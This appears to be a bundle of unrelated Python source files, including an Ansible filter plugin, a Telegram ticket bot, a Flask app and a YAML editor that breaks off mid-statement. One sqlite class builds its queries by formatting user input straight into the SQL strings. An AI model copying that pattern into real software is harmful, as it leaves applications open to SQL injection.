from __future__ import (absolute_import, division, print_function) __metaclass__ = type import subprocess import sys import ipaddress from ansible.errors import AnsibleFilterError from ansible.module_utils.common.process import get_bin_path from ansible.module_utils._text import to_text from ansible.module_utils.six import next try: HAS_HUMANFRIENDLY = True import humanfriendly except ImportError: HAS_HUMANFRIENDLY = False PY2 = sys.version_info[0] == 2 def _decode(value): return value if PY2 else value.decode() def _encode(value): return value if PY2 else value.encode() def parse_size(user_input, binary=False): '''https://github.com/xolox/python-humanfriendly''' if not HAS_HUMANFRIENDLY: raise AnsibleFilterError("humanfriendly needs to be installed") return humanfriendly.parse_size(user_input, binary=binary) def transpile_ignition_config(ignition_config): '''https://github.com/coreos/container-linux-config-transpiler''' try: bin_path = get_bin_path("ct", required=True, opt_dirs=None) except ValueError as e: raise AnsibleFilterError("ct needs to be installed: %s" % e.message) process = subprocess.Popen(["ct"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) out, err = process.communicate(input=_encode(ignition_config)) return_code = process.returncode if return_code != 0: raise AnsibleFilterError("transpilation failed with return code %d: %s (%s)" % (return_code, out, err)) return _decode(out.strip()) def _extract_asn(tags): asn = None for tag in tags: if tag.startswith('machine.metal-stack.io/network.primary.asn='): asn = tag.split('=')[1] return asn def _generate_node_selectors(host): match_expression = dict() match_expression['key'] = 'kubernetes.io/hostname' match_expression['operator'] = 'In' match_expression['values'] = [host] node_selector = dict() node_selector['match-expressions'] = [match_expression] node_selectors = [] node_selectors.append(node_selector) return node_selectors def _extract_peer_address(host, k8s_nodes): for node in k8s_nodes: if node['metadata']['name'] == host: cidr = node['spec']['podCIDR'] if PY2: cidr = unicode(cidr) net = ipaddress.ip_network(cidr) gen = net.hosts() return str(next(gen)) raise AnsibleFilterError("could not find host in k8s nodes and determine peer address: %s", host) def metal_lb_conf(hostnames, hostvars, cidrs, k8s_nodes): peers = [] for host in hostnames: host_vars = hostvars[host] if not host_vars: raise AnsibleFilterError("host has no hostvars: %s", host) if 'metal_tags' not in host_vars: raise AnsibleFilterError("host has no metal_tags: %s", host) if 'metal_hostname' not in host_vars: raise AnsibleFilterError("host has no metal_hostname: %s", host) asn = _extract_asn(host_vars['metal_tags']) if not asn: raise AnsibleFilterError("host has no asn specified in its metal_tags: %s", host) p = dict() p['peer-address'] = _extract_peer_address(host_vars['metal_hostname'], k8s_nodes) p['peer-asn'] = int(asn) p['my-asn'] = int(asn) p['node-selectors'] = _generate_node_selectors(host_vars['metal_hostname']) peers.append(p) address_pool = dict() address_pool['name'] = 'default' address_pool['protocol'] = 'bgp' address_pool['addresses'] = cidrs address_pools = [address_pool] return { 'peers': peers, 'address-pools': address_pools } class FilterModule(object): '''Common cloud-native filter plugins''' def filters(self): return { 'humanfriendly': parse_size, 'transpile_ignition_config': transpile_ignition_config, 'metal_lb_conf': metal_lb_conf, }
python
# # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from heat.common.i18n import _ SUPPORT_STATUSES = (UNKNOWN, SUPPORTED, DEPRECATED, UNSUPPORTED, HIDDEN ) = ('UNKNOWN', 'SUPPORTED', 'DEPRECATED', 'UNSUPPORTED', 'HIDDEN') class SupportStatus(object): def __init__(self, status=SUPPORTED, message=None, version=None, previous_status=None): """Use SupportStatus for current status of object. :param status: current status of object. :param version: version of OpenStack, from which current status is valid. It may be None, but need to be defined for correct doc generating. :param message: specific status message for object. """ self.status = status self.message = message self.version = version self.previous_status = previous_status self.validate() def validate(self): if (self.previous_status is not None and not isinstance(self.previous_status, SupportStatus)): raise ValueError(_('previous_status must be SupportStatus ' 'instead of %s') % type(self.previous_status)) if self.status not in SUPPORT_STATUSES: self.status = UNKNOWN self.message = _("Specified status is invalid, defaulting to" " %s") % UNKNOWN self.version = None self.previous_status = None def to_dict(self): return {'status': self.status, 'message': self.message, 'version': self.version, 'previous_status': self.previous_status.to_dict() if self.previous_status is not None else None} def is_valid_status(status): return status in SUPPORT_STATUSES
python
import sqlite3 class Database: def __init__(self, dbname): self.conn = sqlite3.connect(dbname) self.conn.execute("CREATE TABLE IF NOT EXISTS shotmeter (" \ "id INTEGER PRIMARY KEY, " \ "groupname TEXT not null , " \ "shotcount INTEGER," \ "CONSTRAINT groupname_uq UNIQUE (groupname))") def add_entry(self, groupname, shots): cur = self.conn.cursor() sql = "SELECT * FROM shotmeter where groupname = '{groupname}' LIMIT 1".format(groupname=groupname) cur.execute(sql) print(sql) rows = cur.fetchall() print(len(rows)) print(rows) if len(rows) > 0: newshots = rows[0][2] + int(shots) print(newshots) sql = "UPDATE shotmeter set shotcount = {shotcount} where groupname = '{groupname}'".format( shotcount=newshots, groupname=groupname) else: sql = "INSERT INTO shotmeter ('groupname', 'shotcount') VALUES ('{groupname}', {shotcount})".format( groupname=groupname, shotcount=shots) self.conn.execute(sql) self.conn.commit() def get_grounames(self): sql = "select groupname from shotmeter" rows = self.conn.execute(sql) names = [] for name in rows: print(name) names.append(name[0]) return names def get_group_shots(self): sql = "select * from shotmeter order by shotcount desc" cur = self.conn.cursor() cur.execute(sql) rows = cur.fetchall() print(rows) return rows
python
#/* # * Player - One Hell of a Robot Server # * Copyright (C) 2004 # * Andrew Howard # * # * # * This library is free software; you can redistribute it and/or # * modify it under the terms of the GNU Lesser General Public # * License as published by the Free Software Foundation; either # * version 2.1 of the License, or (at your option) any later version. # * # * This library is distributed in the hope that it will be useful, # * but WITHOUT ANY WARRANTY; without even the implied warranty of # * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # * Lesser General Public License for more details. # * # * You should have received a copy of the GNU Lesser General Public # * License along with this library; if not, write to the Free Software # * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA # */ # Desc: Test the position2d interface # Author: Andrew Howard # Date: 15 Sep 2004 # CVS: $Id: test_position2d.py 8114 2009-07-24 11:28:20Z thjc $ from playerc import * def test_position2d(client, index, context): """Basic test of the position2d interface.""" position2d = playerc_position2d(client, index) if position2d.subscribe(PLAYERC_OPEN_MODE) != 0: raise playerc_error_str() for i in range(20): while 1: id = client.read() if id == position2d.info.id: break if context: print context, print "position2d: [%14.3f] " % (position2d.info.datatime), print '[%6.3f %6.3f %6.3f]' % (position2d.px, position2d.py, position2d.pa) position2d.unsubscribe() return
python
from math import * import math from .math_eval import * one_arg_mathfuncs = {} for funcname in dir(math): func = globals()[funcname] try: func(2) # if this works, the function accepts one arg one_arg_mathfuncs[funcname] = func except Exception as ex: # this is most likely either because func requires multiple args # or because it's not a function (e.g., math.tau). if "math domain error" in repr(ex): # the function accepts one arg, but not 2. E.g., acos, asin. one_arg_mathfuncs[funcname] = func safe_ufunctions.update(one_arg_mathfuncs) ufunctions.update(one_arg_mathfuncs) class Equation: '''Python 2 had a package on the PYPI called Equation that did something like safe_compute. This is a revival of that. The Equation class is more or less a wrapper around safe_compute with some extra math functions thrown in. Every single-variable function in Python's built-in "math" module is available for use here. ''' def __init__(self, eqn): self.eqn = eqn self.expr = compute(eqn, safe = True) self.varnames = get_varnames(tokenize(eqn), safe = True) def __call__(self, *args): return self.expr(*args) def __repr__(self): return f"Equation({self.eqn})" __str__ = __repr__
python
# Copyright (c) 2015, Scott J Maddox. All rights reserved. # Use of this source code is governed by the BSD-3-Clause # license that can be found in the LICENSE file. import os import sys fpath = os.path.join(os.path.dirname(__file__), '../fdint/_nonparabolic.pyx') templates_dir = os.path.join(os.path.dirname(__file__), 'templates/') import numpy INF = numpy.inf with open(fpath, 'w') as f: # Generate `nonparabolic`, etc. for i in xrange(1): k2 = str(i).replace('-','m') f.write(''' @cython.cdivision(True) cdef inline double nonparabolic(double phi, double alpha):''') for phi_min, phi_max, ext in [(-INF, -2e0, '_lt_m2'), (-2e0, 0e0, '_m2_to_0'), ( 0e0, 2e0, '_0_to_2'), ( 2e0, 5e0, '_2_to_5'), ( 5e0, 10e0, '_5_to_10'), (10e0, 20e0, '_10_to_20'), (20e0, 40e0, '_20_to_40'), (40e0, INF, '_gt_40')]: if phi_max != INF: #TODO: binary search optimization f.write(''' if phi < {phi_max:.1f}: return nonparabolic{ext}(phi, 2.0*alpha)'''.format(ext=ext,phi_max=phi_max)) else: f.write(''' return nonparabolic{ext}(phi, 2.0*alpha) '''.format(ext=ext,phi_max=phi_max)) # Generate `nonparabolic_lt_m2`, etc. for i in xrange(1,2): k2 = str(i).replace('-','m') for phi_min, phi_max, ext in [(-INF, -2e0, '_lt_m2'), (-2e0, 0e0, '_m2_to_0'), ( 0e0, 2e0, '_0_to_2'), ( 2e0, 5e0, '_2_to_5'), ( 5e0, 10e0, '_5_to_10'), (10e0, 20e0, '_10_to_20'), (20e0, 40e0, '_20_to_40'), (40e0, INF, '_gt_40')]: f.write(''' @cython.cdivision(True) cdef inline double nonparabolic{ext}(double phi, double beta):''' ''.format(ext=ext)) for m, k in enumerate(xrange(i, 22, 2)): # m is the order of the approximation if m == 0: continue # skip 0th order if m > 9: break #TODO: binary search optimization if phi_max != INF: f.write(''' if(beta <= BS1h{ext}__{m} and beta <= BS3h{ext}__{m}): return nonparabolic{ext}__{m}(phi, beta)'''.format(ext=ext, m=m)) if m % 2 == 1: last_odd_m = m if phi_max != INF: f.write(''' warnings.warn('nonparabolic: less than 24 bits of accuracy', RuntimeWarning) return nonparabolic{ext}__{m}(phi, beta) '''.format(ext=ext, m=last_odd_m)) else: f.write(''' warnings.warn('nonparabolic: 24 bits of accuracy not guaranteed', RuntimeWarning) return nonparabolic{ext}__{m}(phi, beta) '''.format(ext=ext, m=last_odd_m)) # Generate `nonparabolic_lt_m2`, etc. for phi_min, phi_max, ext in [(-INF, -2e0, '_lt_m2'), (-2e0, 0e0, '_m2_to_0'), ( 0e0, 2e0, '_0_to_2'), ( 2e0, 5e0, '_2_to_5'), ( 5e0, 10e0, '_5_to_10'), (10e0, 20e0, '_10_to_20'), (20e0, 40e0, '_20_to_40'), (40e0, INF, '_gt_40')]: for m, _ in enumerate(xrange(i, 22, 2)): # m is the order of the approximation if m == 0: continue # skip 0th order if m > 9: break f.write(''' @cython.cdivision(True) cdef inline double nonparabolic{ext}__{m}(double phi, double beta): ''' ''.format(ext=ext, m=m)) # f1h=fd1h_lt_m2(phi), etc. for n, nk2 in enumerate(xrange(1, 22, 2)): nk2 = str(nk2).replace('-','m') if n > m+1: break f.write(' cdef double f{nk2}h=fd{nk2}h{ext}(phi)\n' ''.format(nk2=nk2, ext=ext)) # gf1h=..., gf3h=... for i in xrange(1,4,2): k2 = str(i).replace('-','m') for n, nk2 in enumerate(xrange(i, 22, 2)): if n > m: break nk2 = str(nk2).replace('-','m') if n == 0: f.write(' cdef double gf{k2}h=( G0 *f{nk2}h\n' ''.format(k2=k2, nk2=nk2, ext=ext)) else: mstr = str(m).replace('10','A') nstr = str(n).replace('10','A') f.write(' +beta*(G{m}{n}*f{nk2}h\n' ''.format(nk2=nk2, ext=ext, m=mstr, n=nstr, )) f.write(' )'+')'*m+'\n') f.write(' return gf1h+beta*gf3h\n')
python
import re import traceback import telegram from telegram.ext.dispatcher import run_async from mayday import LogConfig from mayday.constants import TICKET_MAPPING, conversations, stages from mayday.constants.replykeyboards import ReplyKeyboards from mayday.controllers.request import RequestHelper from mayday.helpers.update_helper import UpdateHelper from mayday.utils import log_util flogger = LogConfig.flogger KEYBOARDS = ReplyKeyboards() request_helper = RequestHelper() update_helper = UpdateHelper('update_ticket') @run_async def start(bot, update, user_data): try: telegram_info = update._effective_user message = update.callback_query.message callback_data = update.callback_query.data tickets = request_helper.send_search_my_ticket(userid=telegram_info.id) if tickets['status'] and tickets['info']: tickets = tickets['info'] ticket_ids = update_helper.extract_ticket_ids(tickets) msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data, rtn_ticket=tickets ) flogger.info(msg) bot.edit_message_text( text=update_helper.tickets_tostr(tickets), chat_id=telegram_info.id, message_id=message.message_id, reply_markup=update_helper.list_tickets_on_reply_keyboard(ticket_ids) ) return stages.UPDATE_SELECT_TICKET else: flogger.debug(tickets) msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data ) flogger.info(msg) bot.edit_message_text( chat_id=telegram_info.id, message_id=message.message_id, text=conversations.NONE_RECORD, reply_markup=KEYBOARDS.return_main_panal ) return stages.MAIN_PANEL except Exception: msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data, extra=str(update), trace_back=str(traceback.format_exc()) ) flogger.error(msg) @run_async def select_ticket(bot, update, user_data): try: telegram_info = update._effective_user callback_data = update.callback_query.data if callback_data == 'mainpanel': msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data ) flogger.info(msg) bot.edit_message_text( chat_id=telegram_info.id, message_id=update.callback_query.message.message_id, text=conversations.MAIN_PANEL_START.format_map({'username': telegram_info.username}), reply_markup=KEYBOARDS.actions_keyboard_markup ) return stages.MAIN_PANEL if re.match(r'\d+', callback_data): ticket = request_helper.send_search_ticket_by_ticket_id(ticket_id=callback_data) update_helper.set_cache(user_id=telegram_info.id, content=ticket['info']) flatten_ticket = update_helper.flatten(ticket['info']) msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data, rtn_ticket=ticket ) flogger.info(msg) bot.edit_message_text( text=conversations.UPDATE_YOURS.format_map(flatten_ticket), chat_id=telegram_info.id, message_id=update.callback_query.message.message_id, reply_markup=KEYBOARDS.update_ticket_keyboard_markup ) return stages.UPDATE_SELECT_FIELD except Exception: msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data, extra=str(update), trace_back=str(traceback.format_exc()) ) flogger.error(msg) @run_async def select_field(bot, update, user_data): try: callback_data = update.callback_query.data message = update.callback_query.message telegram_info = update._effective_user update_helper.set_last_choice(user_id=telegram_info.id, content=callback_data) flogger.info(callback_data) if callback_data == 'mainpanel': msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data ) flogger.info(msg) bot.edit_message_text( chat_id=telegram_info.id, message_id=update.callback_query.message.message_id, text=conversations.MAIN_PANEL_START.format_map({'username': telegram_info.username}), reply_markup=KEYBOARDS.actions_keyboard_markup ) return stages.MAIN_PANEL elif callback_data == 'check': ticket = update_helper.get_cache(user_id=telegram_info.id, username=telegram_info.username) flatten_ticket = update_helper.flatten(ticket) msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data, rtn_ticket=ticket ) flogger.info(msg) bot.edit_message_text( text=conversations.UPDATE_CHECK.format_map(flatten_ticket), chat_id=telegram_info.id, message_id=message.message_id, reply_markup=KEYBOARDS.before_submit_post_keyboard_markup ) return stages.UPDATE_BEFORE_SUBMIT else: msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data, ) flogger.info(msg) bot.edit_message_text( text=conversations.UPDATE_INFO.format_map( {'message': TICKET_MAPPING.get(callback_data)} ), chat_id=telegram_info.id, message_id=message.message_id, reply_markup=KEYBOARDS.conditions_keyboard_mapping.get(callback_data) ) return stages.UPDATE_FILL_VALUE except Exception: msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data, extra=str(update), trace_back=str(traceback.format_exc()) ) flogger.error(msg) @run_async def fill_in_field(bot, update, user_data): try: callback_data = update.callback_query.data message = update.callback_query.message if message: telegram_info = update._effective_user ticket = update_helper.update_cache(user_id=telegram_info.id, username=telegram_info.username, content=callback_data) flatten_ticket = update_helper.flatten(ticket) msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data, rtn_ticket=ticket ) flogger.info(msg) bot.edit_message_text( text=conversations.UPDATE_YOURS.format_map(flatten_ticket), chat_id=telegram_info.id, message_id=message.message_id, reply_markup=KEYBOARDS.update_ticket_keyboard_markup ) return stages.UPDATE_SELECT_FIELD else: return stages.UPDATE_FILL_VALUE except Exception: msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data, extra=str(update), trace_back=str(traceback.format_exc()) ) flogger.error(msg) @run_async def fill_type_in_field(bot, update, user_data): try: telegram_info = update._effective_user text = update.message.text ticket = update_helper.update_cache( user_id=telegram_info.id, username=telegram_info.username, content=text) flatten_ticket = update_helper.flatten(ticket) msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=text, rtn_ticket=ticket ) flogger.info(msg) update.message.reply_text( text=conversations.UPDATE_YOURS.format_map(flatten_ticket), reply_markup=KEYBOARDS.update_ticket_keyboard_markup ) return stages.UPDATE_SELECT_FIELD except Exception: msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=text, extra=str(update), trace_back=str(traceback.format_exc()) ) flogger.error(msg) @run_async def submit(bot, update, user_data): try: callback_data = update.callback_query.data message = update.callback_query.message telegram_info = update._effective_user if callback_data == 'mainpanel': msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data ) flogger.info(msg) bot.edit_message_text( chat_id=telegram_info.id, message_id=update.callback_query.message.message_id, text=conversations.MAIN_PANEL_START.format_map({'username': telegram_info.username}), reply_markup=KEYBOARDS.actions_keyboard_markup ) return stages.MAIN_PANEL if callback_data == 'submit': # Kick banned user out! if update_helper.get_lastest_auth(telegram_info) is False: update.message.reply_text(conversations.MAIN_PANEL_YELLOWCOW) return stages.END ticket = update_helper.get_cache(user_id=telegram_info.id, username=telegram_info.username) result = request_helper.send_ticket_update(ticket) if result.get('status'): msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data, rtn_ticket=result ) flogger.info(msg) bot.edit_message_text( text=conversations.UPDATE_INTO_DB, chat_id=telegram_info.id, message_id=message.message_id ) else: msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data, rtn_ticket=result ) flogger.warning(msg) bot.edit_message_text( text=conversations.UPDATE_ERROR, chat_id=telegram_info.id, message_id=message.message_id, ) bot.send_message( text=conversations.AND_THEN, chat_id=telegram_info.id, message_id=message.message_id, reply_markup=KEYBOARDS.after_submit_keyboard ) return stages.UPDATE_SUBMIT except Exception: msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data, extra=str(update), trace_back=str(traceback.format_exc()) ) flogger.error(msg) @run_async def backward(bot, update, user_data): try: callback_data = update.callback_query.data message = update.callback_query.message telegram_info = update._effective_user ticket = update_helper.get_cache(user_id=telegram_info.id, username=telegram_info.username) if callback_data == 'backward': msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data ) flogger.info(msg) bot.edit_message_text( text=conversations.UPDATE_YOURS.format_map( update_helper.flatten(ticket)), chat_id=telegram_info.id, message_id=message.message_id, reply_markup=KEYBOARDS.search_ticket_keyboard_markup ) return stages.UPDATE_SELECT_TICKET if callback_data == 'mainpanel': msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data ) flogger.info(msg) bot.edit_message_text( chat_id=telegram_info.id, message_id=message.message_id, text=conversations.MAIN_PANEL_START.format_map({'username': telegram_info.username}), reply_markup=KEYBOARDS.actions_keyboard_markup ) return stages.MAIN_PANEL except Exception: msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data, extra=str(update), trace_back=str(traceback.format_exc()) ) flogger.error(msg)
python
#!/usr/bin/env python # -*- coding:UTF-8 -*- import dircache from pprint import pprint import os path='../..' contents=dircache.listdir(path) annotated=contents[:] dircache.annotate(path,annotated) fmt='%25s\t%25s' print fmt % ('ORIGINAL','ANNOTATED') print fmt % (('-'*25,)*2) for o,a in zip(contents,annotated): print fmt % (o,a)
python
import asyncio async def req1(): await asyncio.sleep(1) return 1 async def req2(): return 2 async def main(): res = await asyncio.gather(req1(), req2()) print(res) asyncio.get_event_loop().run_until_complete(main())
python
from classes.AttackBarbarians import AttackBarbarians attack = AttackBarbarians(level=36) while True: attack.start()
python
constants = { # --- ASSETS FILE NAMES AND DELAY BETWEEN FOOTAGE "CALIBRATION_CAMERA_STATIC_PATH": "assets/cam1 - static/calibration.mov", "CALIBRATION_CAMERA_MOVING_PATH": "assets/cam2 - moving light/calibration.mp4", "COIN_1_VIDEO_CAMERA_STATIC_PATH": "assets/cam1 - static/coin1.mov", "COIN_1_VIDEO_CAMERA_MOVING_PATH": "assets/cam2 - moving light/coin1.mp4", "COIN_2_VIDEO_CAMERA_STATIC_PATH": "assets/cam1 - static/coin2.mov", "COIN_2_VIDEO_CAMERA_MOVING_PATH": "assets/cam2 - moving light/coin2.mp4", "COIN_3_VIDEO_CAMERA_STATIC_PATH": "assets/cam1 - static/coin3.mov", "COIN_3_VIDEO_CAMERA_MOVING_PATH": "assets/cam2 - moving light/coin3.mp4", "COIN_4_VIDEO_CAMERA_STATIC_PATH": "assets/cam1 - static/coin4.mov", "COIN_4_VIDEO_CAMERA_MOVING_PATH": "assets/cam2 - moving light/coin4.mp4", "FILE_1_MOVING_CAMERA_DELAY": 2.724, # [seconds] (static) 3.609 - 0.885 (moving) "FILE_2_MOVING_CAMERA_DELAY": 2.024, # [seconds] (static) 2.995 - 0.971 (moving) "FILE_3_MOVING_CAMERA_DELAY": 2.275, # [seconds] (static) 3.355 - 1.08 (moving) "FILE_4_MOVING_CAMERA_DELAY": 2.015, # [seconds] (static) 2.960 - 0.945 (moving) # --- CAMERA CALIBRATION CONSTANTS "CHESSBOARD_SIZE": (6, 9), "CALIBRATION_FRAME_SKIP_INTERVAL": 40, # We just need some, not all # --- ANALYSIS CONSTANTS "SQAURE_GRID_DIMENSION": 200, # It will be a 400x400 square grid inside the marker "ALIGNED_VIDEO_FPS": 30, "ANALYSIS_FRAME_SKIP": 5, # It will skip this frames each iteration during analysis # --- DEBUG CONSTANTS "STATIC_CAMERA_FEED_WINDOW_TITLE": "Static camera feed", "MOVING_CAMERA_FEED_WINDOW_TITLE": "Moving camera feed", "WARPED_FRAME_WINDOW_TITLE": "Warped moving frame", "LIGHT_DIRECTION_WINDOW_TITLE": "Light direction", "LIGHT_DIRECTION_WINDOW_SIZE": 200, # --- INTERACTIVE RELIGHTING CONSTANTS "INTERPOLATED_WINDOW_TITLE": "Interpolated Data", "INPUT_LIGHT_DIRECTION_WINDOW_TITLE": "Light direction input", # --- DATA FILE NAMES CONSTANTS "CALIBRATION_INTRINSICS_CAMERA_STATIC_PATH": "data/static_intrinsics.xml", "CALIBRATION_INTRINSICS_CAMERA_MOVING_PATH": "data/moving_intrinsics.xml", "COIN_1_ALIGNED_VIDEO_STATIC_PATH": "data/1_static_aligned_video.mov", "COIN_1_ALIGNED_VIDEO_MOVING_PATH": "data/1_moving_aligned_video.mp4", "COIN_2_ALIGNED_VIDEO_STATIC_PATH": "data/2_static_aligned_video.mov", "COIN_2_ALIGNED_VIDEO_MOVING_PATH": "data/2_moving_aligned_video.mp4", "COIN_3_ALIGNED_VIDEO_STATIC_PATH": "data/3_static_aligned_video.mov", "COIN_3_ALIGNED_VIDEO_MOVING_PATH": "data/3_moving_aligned_video.mp4", "COIN_4_ALIGNED_VIDEO_STATIC_PATH": "data/4_static_aligned_video.mov", "COIN_4_ALIGNED_VIDEO_MOVING_PATH": "data/4_moving_aligned_video.mp4", "COIN_1_EXTRACTED_DATA_FILE_PATH": "data/1_extracted_data.npz", "COIN_2_EXTRACTED_DATA_FILE_PATH": "data/2_extracted_data.npz", "COIN_3_EXTRACTED_DATA_FILE_PATH": "data/3_extracted_data.npz", "COIN_4_EXTRACTED_DATA_FILE_PATH": "data/4_extracted_data.npz", "COIN_1_INTERPOLATED_DATA_RBF_FILE_PATH": "data/1_rbf_interpolated_data.npz", "COIN_2_INTERPOLATED_DATA_RBF_FILE_PATH": "data/2_rbf_interpolated_data.npz", "COIN_3_INTERPOLATED_DATA_RBF_FILE_PATH": "data/3_rbf_interpolated_data.npz", "COIN_4_INTERPOLATED_DATA_RBF_FILE_PATH": "data/4_rbf_interpolated_data.npz", "COIN_1_INTERPOLATED_DATA_PTM_FILE_PATH": "data/1_ptm_interpolated_data.npz", "COIN_2_INTERPOLATED_DATA_PTM_FILE_PATH": "data/2_ptm_interpolated_data.npz", "COIN_3_INTERPOLATED_DATA_PTM_FILE_PATH": "data/3_ptm_interpolated_data.npz", "COIN_4_INTERPOLATED_DATA_PTM_FILE_PATH": "data/4_ptm_interpolated_data.npz", }
python
def counter(T): c = 0 l = 0 for i in T: if len(set(i.lower())) > c: l = len(i) c = len(set(i.lower())) elif (len(set(i.lower())) == c) & (len(i) > l): l = len(i) c = len(set(i.lower())) return l
python
#!/usr/bin/env python """ Example application views. Note that `render_template` is wrapped with `make_response` in all application routes. While not necessary for most Flask apps, it is required in the App Template for static publishing. """ import app_config import json import oauth import static import re import string from datetime import datetime from PIL import Image from flask import Flask, make_response, render_template from render_utils import make_context, smarty_filter, urlencode_filter from werkzeug.debug import DebuggedApplication app = Flask(__name__) app.debug = app_config.DEBUG app.add_template_filter(smarty_filter, name='smarty') app.add_template_filter(urlencode_filter, name='urlencode') @app.route('/') # @oauth.oauth_required def index(): """ Example view demonstrating rendering a simple HTML page. """ context = make_context() context['dateModified'] = datetime.now().strftime("%Y-%m-%d %H:%M:%S") context['now'] = datetime.now().strftime("%d.%m.%Y") with open('data/featured.json') as f: context['featured'] = json.load(f) # Read the books JSON into the page. # with open('www/static-data/books.json', 'rb') as readfile: # context['books_js'] = readfile.read() context['API_URL'] = app_config.API_URL return make_response(render_template('index.html', **context)) @app.route('/share/<slug>.html') def share(slug): featured_book = None context = make_context() context['dateModified'] = datetime.now().strftime("%Y-%m-%d %H:%M:%S") context['now'] = datetime.now().strftime("%d.%m.%Y") with open('www/static-data/books.json', 'rb') as f: books = json.load(f) for book in books: if book.get('slug') == slug: featured_book = book break if not featured_book: return 404 featured_book['thumb'] = "%sassets/cover/%s.jpg" % (context['SHARE_URL'], featured_book['slug']) try: book_image = Image.open('www/assets/cover/%s.jpg' % featured_book['slug']) width, height = book_image.size context['thumb_width'] = width context['thumb_height'] = height except IOError: context['thumb_width'] = None context['thumb_height'] = None context['twitter_handle'] = 'nprbooks' context['book'] = featured_book return make_response(render_template('share.html', **context)) @app.route('/tag_share/<slug>.html') def tag_share(slug): featured_tag = None context = make_context() tags = context['COPY']['tags'] for tag in tags: if tag['key'] == slug: featured_tag = tag break if not featured_tag: return 404 context['tag_thumb'] = "%sassets/tag/%s.jpg" % (context['SHARE_URL'], featured_tag['img']) try: book_image = Image.open('www/assets/tag/%s.jpg' % featured_tag['img']) width, height = book_image.size context['thumb_width'] = width context['thumb_height'] = height except IOError: context['thumb_width'] = None context['thumb_height'] = None context['twitter_handle'] = 'nprbooks' context['tag'] = featured_tag return make_response(render_template('tag_share.html', **context)) @app.route('/seamus') def seamus(): """ Preview for Seamus page """ context = make_context() # Read the books JSON into the page. with open('www/static-data/books.json', 'rb') as readfile: books_data = json.load(readfile) books = sorted(books_data, key=lambda k: k['title']) # Harvest long tag names for book in books: tag_list = [] for tag in book['tags']: tag_list.append(context['COPY']['tags'][tag]['value']) book['tag_list'] = tag_list context['books'] = books return render_template('seamus-preview.html', **context) @app.route('/coming-soon.html') def coming_soon(): context = make_context() return make_response(render_template('coming-soon.html', **context)) app.register_blueprint(static.static) app.register_blueprint(oauth.oauth) # Enable Werkzeug debug pages if app_config.DEBUG: wsgi_app = DebuggedApplication(app, evalex=False) else: wsgi_app = app # Catch attempts to run the app directly if __name__ == '__main__': print 'This command has been removed! Please run "fab app" instead!'
python
#!/usr/bin/python # # yamledit.py # github.com/microtodd/yamledit # import os import sys import getopt import ruamel.yaml from ruamel import yaml from ruamel.yaml.scalarstring import SingleQuotedScalarString, DoubleQuotedScalarString __version__ = '0.5' # TODO # # ) merge two yaml files capability # ) Support input pipe instead of file # ## printHelp # def printHelp(): print ''' yamledit.py Editor for Commandline for YAML Options: -h Print this help -v Version -f <filename> Input file -o <filename> Output file, if not specified goes to STDOUT -y If passed then any user confirmation is assumed 'yes' -q If passed then everything is silent. This option implies -y. You must pick one and only one: -r or -c or -n or -d or -g If you pick -r or -c or -d, you must specify -f as well <newvalue> can be a comma-separated list, which is treated as a YAML list -r <key> <newvalue> Replace. 'key' is of format foo.bar.biz.baz If key does not exist, returns error. If used it must be the last option used. -c <key> <newvalue> Create. 'key' is of format foo.bar.biz.baz. If key already exists, will prompt to overwrite unless -y is selected. If used it must be the last option used. -n <key> <value> New file with 'key' with value 'value'. -d <key> Delete 'key' -g <key> Print the value of <key>, to STDOUT or to the filename ''' ## printVersion # def printVersion(): print ' yamledit.py Version ' + str(__version__) ## createFile # # @param[in] filename # @param[in] data # @param[in] autoConfirm # @param[in] quiet # def createFile(outputFileName, data, autoConfirm, quiet): # see if file exists if os.path.exists(outputFileName): # See if we autoconfirmed if autoConfirm or quiet: pass else: userInput = raw_input('File \'' + str(outputFileName) + '\' exists. Overwrite? (y/n): ') if userInput != 'y' and userInput != 'Y': print 'Aborting.' return # Create the file newFile = open(outputFileName,'w') newFile.write( 